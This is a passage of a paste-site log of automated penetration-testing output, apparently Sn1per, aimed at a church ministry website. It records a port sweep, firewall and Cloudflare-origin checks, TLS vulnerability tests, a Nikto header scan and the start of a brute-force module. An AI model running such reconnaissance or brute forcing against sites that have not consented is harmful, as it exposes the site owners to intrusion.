  4689.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4690. |_[ + ] [ 8 / 13 ]-[23:13:23] [ - ] 
  4691. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/index.php/messages ]
  4692. |_[ + ] Exploit:: 
  4693. |_[ + ] Information Server:: , , IP::0 
  4694. |_[ + ] More details:: 
  4695. |_[ + ] Found:: UNIDENTIFIED
  4696. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4697. 
  4698.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4699. |_[ + ] [ 9 / 13 ]-[23:13:28] [ - ] 
  4700. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/pastor-s-corner ]
  4701. |_[ + ] Exploit:: 
  4702. |_[ + ] Information Server:: , , IP::0 
  4703. |_[ + ] More details:: 
  4704. |_[ + ] Found:: UNIDENTIFIED
  4705. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4706. 
  4707.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4708. |_[ + ] [ 10 / 13 ]-[23:13:33] [ - ] 
  4709. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/index.php/directions ]
  4710. |_[ + ] Exploit:: 
  4711. |_[ + ] Information Server:: , , IP::0 
  4712. |_[ + ] More details:: 
  4713. |_[ + ] Found:: UNIDENTIFIED
  4714. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4715. 
  4716.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4717. |_[ + ] [ 11 / 13 ]-[23:13:38] [ - ] 
  4718. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/index.php/privacy-policy ]
  4719. |_[ + ] Exploit:: 
  4720. |_[ + ] Information Server:: , , IP::0 
  4721. |_[ + ] More details:: 
  4722. |_[ + ] Found:: UNIDENTIFIED
  4723. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4724. 
  4725.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4726. |_[ + ] [ 12 / 13 ]-[23:13:43] [ - ] 
  4727. |_[ + ] Target:: [ https://www.wordofknowledgeministries.com/contact-us/2-uncategorised/11-pastor-s-corner-2 ]
  4728. |_[ + ] Exploit:: 
  4729. |_[ + ] Information Server:: , , IP::0 
  4730. |_[ + ] More details:: 
  4731. |_[ + ] Found:: UNIDENTIFIED
  4732. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  4733.  
  4734. [ INFO ] [ Shutting down ]
  4735. [ INFO ] [ End of process INURLBR at [05-01-2018 23:13:43]
  4736. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  4737. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-wordofknowledgeministries.com.txt ]
  4738. |_________________________________________________________________________________________
  4739.  
  4740. \_________________________________________________________________________________________/
  4741.  
  4742.  + -- --=[Port 110 closed... skipping.
  4743.  + -- --=[Port 111 closed... skipping.
  4744.  + -- --=[Port 135 closed... skipping.
  4745.  + -- --=[Port 139 closed... skipping.
  4746.  + -- --=[Port 161 closed... skipping.
  4747.  + -- --=[Port 162 closed... skipping.
  4748.  + -- --=[Port 389 closed... skipping.
  4749.  + -- --=[Port 443 opened... running tests...
  4750.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  4751.  
  4752. ^ ^
  4753. _ __ _ ____ _ __ _ _ ____
  4754. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  4755. | V V // o // _/ | V V // 0 // 0 // _/
  4756. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  4757. <
  4758. ...'
  4759.  
  4760. WAFW00F - Web Application Firewall Detection Tool
  4761.  
  4762. By Sandro Gauci && Wendel G. Henrique
  4763.  
  4764. Checking https://wordofknowledgeministries.com
  4765.  
  4766.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  4767. ____ _ _ _____ _ _
  4768. / ___| | ___ _ _ __| | ___|_ _(_) |
  4769. | | | |/ _ \| | | |/ _` | |_ / _` | | |
  4770. | |___| | (_) | |_| | (_| | _| (_| | | |
  4771. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
  4772. v1.0.1 by m0rtem
  4773.  
  4774.  
  4775. [23:13:49] Initializing CloudFail - the date is: 05/01/2018
  4776. [23:13:49] Fetching initial information from: wordofknowledgeministries.com...
  4777. [23:13:49] No ipout file found, fetching data
  4778. [23:13:49] Just checking for updates, please wait...
  4779. [23:13:49] Updating CloudFlare subnet...
  4780. [23:13:49] Updating Crimeflare database...
  4781. [23:15:36] ipout file created
  4782. [23:15:36] Server IP: 192.124.249.7
  4783. [23:15:36] Testing if wordofknowledgeministries.com is on the Cloudflare network...
  4784. [23:15:36] wordofknowledgeministries.com is not part of the Cloudflare network, quitting...
  4785.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  4786. https://wordofknowledgeministries.com [ Unassigned]
  4787.  
  4788.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  4789.  
  4790.  
  4791.  
  4792. AVAILABLE PLUGINS
  4793. -----------------
  4794.  
  4795. PluginSessionResumption
  4796. PluginOpenSSLCipherSuites
  4797. PluginHeartbleed
  4798. PluginSessionRenegotiation
  4799. PluginChromeSha1Deprecation
  4800. PluginHSTS
  4801. PluginCertInfo
  4802. PluginCompression
  4803.  
  4804.  
  4805.  
  4806. CHECKING HOST(S) AVAILABILITY
  4807. -----------------------------
  4808.  
  4809. wordofknowledgeministries.com => WARNING: Could not connect (timeout); discarding corresponding tasks.
  4810.  
  4811.  
  4812.  
  4813. SCAN COMPLETED IN 5.02 S
  4814. ------------------------
  4815. Version: 1.11.10-static
  4816. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  4817. 
  4818. 
  4819. ###########################################################
  4820. testssl 2.9dev from https://testssl.sh/dev/
  4821. 
  4822. This program is free software. Distribution and
  4823. modification under GPLv2 permitted.
  4824. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  4825.  
  4826. Please file bugs @ https://testssl.sh/bugs/
  4827. 
  4828. ###########################################################
  4829.  
  4830. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  4831. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  4832. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  4833.  
  4834.  
  4835.  Start 2018-01-05 23:19:14 -->> 192.124.249.7:443 (wordofknowledgeministries.com) <<--
  4836.  
  4837. rDNS (192.124.249.7): cloudproxy10007.sucuri.net.
  4838. Service detected: HTTP
  4839.  
  4840.  
  4841.  Testing protocols via sockets except SPDY+HTTP2 
  4842.  
  4843.  SSLv2 not offered (OK)
  4844.  SSLv3 not offered (OK)
  4845.  TLS 1 offered
  4846.  TLS 1.1 offered
  4847.  TLS 1.2 offered (OK)
  4848.  TLS 1.3 not offered
  4849.  SPDY/NPN h2, http/1.1 (advertised)
  4850.  HTTP2/ALPN h2, http/1.1 (offered)
  4851.  
  4852.  Testing ~standard cipher categories 
  4853.  
  4854.  NULL ciphers (no encryption) not offered (OK)
  4855.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  4856.  Export ciphers (w/o ADH+NULL) not offered (OK)
  4857.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  4858.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  4859.  Triple DES Ciphers (Medium) not offered (OK)
  4860.  High encryption (AES+Camellia, no AEAD) offered (OK)
  4861.  Strong encryption (AEAD ciphers) offered (OK)
  4862.  
  4863.  
  4864.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  4865.  
  4866.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
  4867. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  4868. ECDHE-RSA-AES128-GCM-SHA256
  4869. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  4870.  Elliptic curves offered: sect283k1 sect283r1 sect409k1 sect409r1 sect571k1
  4871. sect571r1 secp256k1 prime256v1 secp384r1
  4872. secp521r1 brainpoolP256r1 brainpoolP384r1
  4873. brainpoolP512r1
  4874.  
  4875.  
  4876.  Testing server preferences 
  4877.  
  4878.  Has server cipher order? yes (OK)
  4879.  Negotiated protocol TLSv1.2
  4880.  Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4881.  Cipher order
  4882. TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
  4883. TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
  4884. TLSv1.2: ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256
  4885. ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-GCM-SHA384
  4886. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA AES128-SHA
  4887. AES256-SHA
  4888.  
  4889.  
  4890.  Testing server defaults (Server Hello) 
  4891.  
  4892.  TLS extensions (standard) "server name/#0" "renegotiation info/#65281"
  4893. "EC point formats/#11" "session ticket/#35"
  4894. "heartbeat/#15" "next protocol/#13172"
  4895. "application layer protocol negotiation/#16"
  4896.  Session Ticket RFC 5077 hint 300 seconds, session tickets keys seems to be rotated < daily
  4897.  SSL Session ID support yes
  4898.  Session Resumption Tickets: yes, ID: yes
  4899.  TLS clock skew Random values, no fingerprinting possible
  4900.  Signature Algorithm SHA256 with RSA
  4901.  Server key size RSA 2048 bits
  4902.  Fingerprint / Serial SHA1 550440894DAA50D8100B50DDDAA01FDFAD39D506 / 03F6307746D772AA900AECA30686B41FCE4F
  4903. SHA256 536EB3FCF2AF998E5E17A08ECBB75A6328FF0B72ECDA951A69FA83E4078D52E9
  4904.  Common Name (CN) wordofknowledgeministries.com (CN in response to request w/o SNI: *.sucuri.net)
  4905.  subjectAltName (SAN) wordofknowledgeministries.com
  4906. www.wordofknowledgeministries.com 
  4907.  Issuer Let's Encrypt Authority X3 (Let's Encrypt from US)
  4908.  Trust (hostname) Ok via SAN and CN (SNI mandatory)
  4909.  Chain of trust Ok 
  4910.  EV cert (experimental) no
  4911.  Certificate Expiration 54 >= 30 days (2017-12-01 14:57 --> 2018-03-01 14:57 -0500)
  4912.  # of certificates provided 2
  4913.  Certificate Revocation List --
  4914.  OCSP URI http://ocsp.int-x3.letsencrypt.org
  4915.  OCSP stapling not offered
  4916.  OCSP must staple no
  4917.  DNS CAA RR (experimental) not offered
  4918.  Certificate Transparency no
  4919.  
  4920.  
  4921.  Testing HTTP header response @ "/" 
  4922.  
  4923.  HTTP Status Code  200 OK
  4924.  HTTP clock skew 0 sec from localtime
  4925.  Strict Transport Security --
  4926.  Public Key Pinning --
  4927.  Server banner nginx
  4928.  Application banner --
  4929.  Cookie(s) 1 issued: NOT secure, 1/1 HttpOnly
  4930.  Security headers --
  4931.  Reverse Proxy banner --
  4932.  
  4933.  
  4934.  Testing vulnerabilities 
  4935.  
  4936.  Heartbleed (CVE-2014-0160) not vulnerable (OK), timed out
  4937.  CCS (CVE-2014-0224) not vulnerable (OK)
  4938.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
  4939.  ROBOT not vulnerable (OK)
  4940.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  4941.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  4942.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  4943.  BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
  4944. Can be ignored for static pages or if no secrets in the page
  4945.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  4946.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  4947.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  4948.  FREAK (CVE-2015-0204) not vulnerable (OK)
  4949.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  4950. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  4951. https://censys.io/ipv4?q=536EB3FCF2AF998E5E17A08ECBB75A6328FF0B72ECDA951A69FA83E4078D52E9 could help you to find out
  4952.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  4953.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  4954. ECDHE-RSA-AES256-SHA
  4955. AES128-SHA AES256-SHA 
  4956. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  4957.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  4958.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  4959.  
  4960.  
  4961.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  4962.  
  4963. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  4964. -----------------------------------------------------------------------------------------------------------------------------
  4965. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  4966. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  4967. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  4968. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  4969. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  4970. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  4971. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  4972. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  4973.  
  4974.  
  4975.  Running client simulations via sockets 
  4976.  
  4977. Android 2.3.7 TLSv1.0 AES128-SHA
  4978. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  4979. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  4980. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4981. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4982. Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4983. Android 7.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4984. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4985. Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4986. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4987. Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4988. IE 6 XP No connection
  4989. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  4990. IE 8 XP No connection
  4991. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  4992. IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  4993. IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  4994. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  4995. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4996. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4997. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  4998. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  4999. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  5000. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  5001. Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5002. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5003. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5004. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  5005. Java 6u45 TLSv1.0 AES128-SHA
  5006. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  5007. Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5008. OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5009. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5010.  
  5011.  Done 2018-01-05 23:20:37 [ 150s] -->> 192.124.249.7:443 (wordofknowledgeministries.com) <<--
  5012.  
  5013.  
  5014.  
  5015. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  5016. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  5017. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  5018. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  5019. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  5020. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  5021. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  5022. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  5023. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  5024. ░ ░ 
  5025. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  5026. + -- --=[Checking for DROWN (SSLv2): 192.124.249.7:443
  5027. + -- --=[Checking for HeartBleed: 192.124.249.7:443
  5028. + -- --=[Checking for OpenSSL CCS: 192.124.249.7:443
  5029. + -- --=[Checking for Poodle (SSLv3): 192.124.249.7:443
  5030. + -- --=[Checking for WinShock (MS14-066): 192.124.249.7:443
  5031. Testing if OpenSSL supports the ciphers we are checking for: YES
  5032.  
  5033. Testing 192.124.249.7:443 for availability of SSL ciphers added in MS14-066...
  5034. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
  5035. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
  5036. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
  5037. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
  5038. Testing if IIS is running on port 443: NO
  5039. Checking if target system is running Windows Server 2012 or later...
  5040. Testing cipher ECDHE-RSA-AES256-SHA384: SUPPORTED
  5041. 192.124.249.7:443 is patched: NO
  5042. + -- --=[Scan Complete!
  5043.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  5044. + -- --=[Checking if X-Content options are enabled on wordofknowledgeministries.com... 
  5045.  
  5046. + -- --=[Checking if X-Frame options are enabled on wordofknowledgeministries.com... 
  5047.  
  5048. + -- --=[Checking if X-XSS-Protection header is enabled on wordofknowledgeministries.com... 
  5049.  
  5050. + -- --=[Checking HTTP methods on wordofknowledgeministries.com... 
  5051.  
  5052. + -- --=[Checking if TRACE method is enabled on wordofknowledgeministries.com... 
  5053.  
  5054. + -- --=[Checking for META tags on wordofknowledgeministries.com... 
  5055. <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  5056. <meta name="author" content="Super User" />
  5057. <meta name="generator" content="Joomla! - Open Source Content Management" />
  5058. <meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width" />
  5059.  
  5060. + -- --=[Checking for open proxy on wordofknowledgeministries.com... 
  5061.  
  5062. + -- --=[Enumerating software on wordofknowledgeministries.com... 
  5063. server: nginx
  5064.  
  5065. + -- --=[Checking if Strict-Transport-Security is enabled on wordofknowledgeministries.com... 
  5066.  
  5067. + -- --=[Checking for Flash cross-domain policy on wordofknowledgeministries.com... 
  5068. <div id="techinfo">
  5069. <p>
  5070. Article not found </p>
  5071. </div>
  5072. </div>
  5073. </div>
  5074. </div>
  5075. </div>
  5076. </body>
  5077. </html>
  5078.  
  5079. + -- --=[Checking for Silverlight cross-domain policy on wordofknowledgeministries.com... 
  5080. <div id="techinfo">
  5081. <p>
  5082. Article not found </p>
  5083. </div>
  5084. </div>
  5085. </div>
  5086. </div>
  5087. </div>
  5088. </body>
  5089. </html>
  5090.  
  5091. + -- --=[Checking for HTML5 cross-origin resource sharing on wordofknowledgeministries.com... 
  5092.  
  5093. + -- --=[Retrieving robots.txt on wordofknowledgeministries.com... 
  5094. <div id="techinfo">
  5095. <p>
  5096. Article not found </p>
  5097. </div>
  5098. </div>
  5099. </div>
  5100. </div>
  5101. </div>
  5102. </body>
  5103. </html>
  5104.  
  5105. + -- --=[Retrieving sitemap.xml on wordofknowledgeministries.com... 
  5106. <div id="techinfo">
  5107. <p>
  5108. Article not found </p>
  5109. </div>
  5110. </div>
  5111. </div>
  5112. </div>
  5113. </div>
  5114. </body>
  5115. </html>
  5116.  
  5117. + -- --=[Checking cookie attributes on wordofknowledgeministries.com... 
  5118. set-cookie: ab35ec28c7f75f0e595d9b6a7d0a56a9=svq8952c544lh78a9mb80rlvd4; path=/; HttpOnly
  5119.  
  5120. + -- --=[Checking for ASP.NET Detailed Errors on wordofknowledgeministries.com... 
  5121. <link href="/templates/system/css/error.css" rel="stylesheet" />
  5122. <div class="error">
  5123. <div id="errorboxoutline">
  5124. <div id="errorboxheader">404 - Article not found</div>
  5125. <div id="errorboxbody">
  5126. <li>An error has occurred while processing your request.</li>
  5127. <p>If difficulties persist, please contact the System Administrator of this site and report the error below.</p>
  5128. <link href="/templates/system/css/error.css" rel="stylesheet" />
  5129. <div class="error">
  5130. <div id="errorboxoutline">
  5131. <div id="errorboxheader">404 - Article not found</div>
  5132. <div id="errorboxbody">
  5133. <li>An error has occurred while processing your request.</li>
  5134. <p>If difficulties persist, please contact the System Administrator of this site and report the error below.</p>
  5135.  
  5136. 
  5137.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  5138. - Nikto v2.1.6
  5139. ---------------------------------------------------------------------------
  5140. + Target IP: 192.124.249.7
  5141. + Target Hostname: wordofknowledgeministries.com
  5142. + Target Port: 443
  5143. ---------------------------------------------------------------------------
  5144. + SSL Info: Subject: /CN=wordofknowledgeministries.com
  5145. Ciphers: ECDHE-RSA-AES128-GCM-SHA256
  5146. Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
  5147. + Start Time: 2018-01-05 23:20:56 (GMT-5)
  5148. ---------------------------------------------------------------------------
  5149. + Server: nginx
  5150. + The anti-clickjacking X-Frame-Options header is not present.
  5151. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  5152. + Uncommon header 'x-sucuri-id' found, with contents: 14007
  5153. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  5154. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  5155. + Scan terminated: 20 error(s) and 5 item(s) reported on remote host
  5156. + End Time: 2018-01-05 23:27:41 (GMT-5) (405 seconds)
  5157. ---------------------------------------------------------------------------
  5158. + 1 host(s) tested
  5159.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  5160. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/wordofknowledgeministries.com-port443.jpg
  5161.  + -- --=[Port 445 closed... skipping.
  5162.  + -- --=[Port 512 closed... skipping.
  5163.  + -- --=[Port 513 closed... skipping.
  5164.  + -- --=[Port 514 closed... skipping.
  5165.  + -- --=[Port 623 closed... skipping.
  5166.  + -- --=[Port 624 closed... skipping.
  5167.  + -- --=[Port 1099 closed... skipping.
  5168.  + -- --=[Port 1433 closed... skipping.
  5169.  + -- --=[Port 2049 closed... skipping.
  5170.  + -- --=[Port 2121 closed... skipping.
  5171.  + -- --=[Port 3306 closed... skipping.
  5172.  + -- --=[Port 3310 closed... skipping.
  5173.  + -- --=[Port 3128 closed... skipping.
  5174.  + -- --=[Port 3389 closed... skipping.
  5175.  + -- --=[Port 3632 closed... skipping.
  5176.  + -- --=[Port 4443 closed... skipping.
  5177.  + -- --=[Port 5432 closed... skipping.
  5178.  + -- --=[Port 5800 closed... skipping.
  5179.  + -- --=[Port 5900 closed... skipping.
  5180.  + -- --=[Port 5984 closed... skipping.
  5181.  + -- --=[Port 6000 closed... skipping.
  5182.  + -- --=[Port 6667 closed... skipping.
  5183.  + -- --=[Port 8000 closed... skipping.
  5184.  + -- --=[Port 8100 closed... skipping.
  5185.  + -- --=[Port 8080 closed... skipping.
  5186.  + -- --=[Port 8180 closed... skipping.
  5187.  + -- --=[Port 8443 closed... skipping.
  5188.  + -- --=[Port 8888 closed... skipping.
  5189.  + -- --=[Port 10000 closed... skipping.
  5190.  + -- --=[Port 16992 closed... skipping.
  5191.  + -- --=[Port 27017 closed... skipping.
  5192.  + -- --=[Port 27018 closed... skipping.
  5193.  + -- --=[Port 27019 closed... skipping.
  5194.  + -- --=[Port 28017 closed... skipping.
  5195.  + -- --=[Port 49152 closed... skipping.
  5196.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  5197. #########################################################################################
  5198. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
  5199. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
  5200. `888. .8' .88888. Y88bo. 888 8 888 888
  5201. `888.8' .8' `888. `ZY8888o. 888 8 888 888
  5202. `888' .88ooo8888. `0Y88b 888 8 888 888
  5203. 888 .8' `888. oo .d8P `88. .8' `88b d88'
  5204. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
  5205. Welcome to Yasuo v2.3
  5206. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
  5207. #########################################################################################
  5208.  
  5209. I, [2018-01-05T23:29:12.429635 #3122] INFO -- : Initiating port scan
  5210. I, [2018-01-05T23:29:15.733865 #3122] INFO -- : Using nmap scan output file logs/nmap_output_2018-01-05_23-29-12.xml
  5211.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
  5212.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
  5213.  __________ __ ____ ___
  5214.  \______ \_______ __ ___/ |_ ____ \ \/ /
  5215.  | | _/\_ __ \ | \ __\/ __ \ \ / 
  5216.  | | \ | | \/ | /| | \ ___/ / \ 
  5217.  |______ / |__| |____/ |__| \___ >___/\ \ 
  5218.  \/ \/ \_/
  5219.  
  5220.  + -- --=[BruteX v1.7 by 1N3
  5221.  + -- --=[http://crowdshield.com
  5222. #######################################################################################################################################
Add Comment
Please, Sign In to add comment